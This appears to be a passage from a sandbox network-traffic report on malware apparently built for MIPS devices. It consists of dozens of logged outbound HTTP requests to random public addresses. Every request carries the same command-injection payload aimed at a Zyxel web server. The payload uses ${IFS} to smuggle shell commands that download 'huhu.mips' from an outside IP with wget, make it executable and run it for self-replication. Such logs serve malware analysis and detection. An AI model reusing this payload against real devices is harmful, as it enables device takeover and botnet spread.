                                                        Feb 2, 2024 06:21:05.854976892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3413192.168.2.145101474.146.59.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855015993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3414192.168.2.1441628184.149.107.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855057955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3415192.168.2.1447494111.145.241.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855087996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3416192.168.2.144940288.223.210.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855137110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3417192.168.2.146033657.92.255.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855170012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3418192.168.2.145464066.60.164.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855214119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3419192.168.2.1437456103.210.203.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855238914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3420192.168.2.144690291.37.143.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855269909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3421192.168.2.1453856201.166.208.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855319977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3422192.168.2.145447224.228.236.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855369091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3423192.168.2.145979463.195.170.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855418921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3424192.168.2.1453610109.222.130.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855473042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3425192.168.2.1454274141.123.70.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855498075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3426192.168.2.144521460.92.43.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855550051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3427192.168.2.143392235.164.216.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855565071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3428192.168.2.144637068.227.187.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855606079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3429192.168.2.145778660.23.227.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855638027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3430192.168.2.145487253.221.148.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855705023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3431192.168.2.1447374181.240.53.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855724096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3432192.168.2.1457682195.149.148.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855775118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3433192.168.2.1457460180.73.139.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855827093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3434192.168.2.1437546206.90.48.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855864048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3435192.168.2.1451174192.239.159.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855914116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3436192.168.2.145040644.221.66.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855947971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3437192.168.2.144403418.6.66.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.855976105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3438192.168.2.144510677.204.3.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856015921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3439192.168.2.1446344145.187.178.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856051922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3440192.168.2.1437766105.240.51.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856098890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3441192.168.2.1450894147.198.185.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856126070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3442192.168.2.1449286110.31.139.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856158972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3443192.168.2.1441816218.203.221.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856210947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3444192.168.2.1438178198.40.4.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856240034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3445192.168.2.145104845.93.115.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856283903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3446192.168.2.1456956144.159.159.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856323004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3447192.168.2.145796634.69.121.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856355906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3448192.168.2.1433842179.209.176.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856372118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3449192.168.2.1433078118.79.18.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856426954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3450192.168.2.144456446.76.249.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856471062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3451192.168.2.145047888.23.161.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856513977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3452192.168.2.1449812145.213.109.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856566906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3453192.168.2.145462838.92.244.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856585979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3454192.168.2.144598078.223.194.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856626034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3455192.168.2.1440330201.236.142.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856651068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3456192.168.2.143539638.83.104.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856697083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3457192.168.2.1454030207.144.106.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856729984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3458192.168.2.1443498131.68.108.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856770039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3459192.168.2.1442616179.190.240.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856781006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3460192.168.2.144860820.247.200.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856829882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3461192.168.2.1434666125.166.84.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856863976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3462192.168.2.1449150150.236.246.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856904030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3463192.168.2.145375295.131.57.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856934071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3464192.168.2.143408842.195.124.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.856985092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3465192.168.2.145615899.90.112.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857024908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3466192.168.2.145888862.245.21.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857054949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3467192.168.2.144255258.171.86.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857105017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3468192.168.2.1436306120.128.87.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857135057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3469192.168.2.146069669.140.254.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857198000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3470192.168.2.143821254.239.25.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857244015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3471192.168.2.144061477.229.212.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857289076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3472192.168.2.1438704111.242.201.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857322931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3473192.168.2.1444880130.133.62.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857353926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3474192.168.2.14489669.54.119.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857377052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3475192.168.2.1435284190.175.104.7443
                                                        TimestampBytes transferredDirectionData
